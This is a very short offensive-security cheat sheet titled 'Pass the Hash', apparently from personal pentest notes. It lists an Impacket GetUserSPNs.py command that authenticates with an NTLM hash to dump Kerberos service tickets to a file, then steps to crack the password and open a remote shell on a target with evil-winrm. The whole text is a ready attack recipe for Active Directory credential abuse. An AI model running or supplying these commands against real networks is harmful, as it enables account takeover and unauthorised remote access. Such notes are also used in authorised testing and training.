# Pass the Hash

## Usage

```sh
GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt
```
* Crack the password
* login
```sh 
evilwinrm -i $TARGET_IP -u <user> -p password
```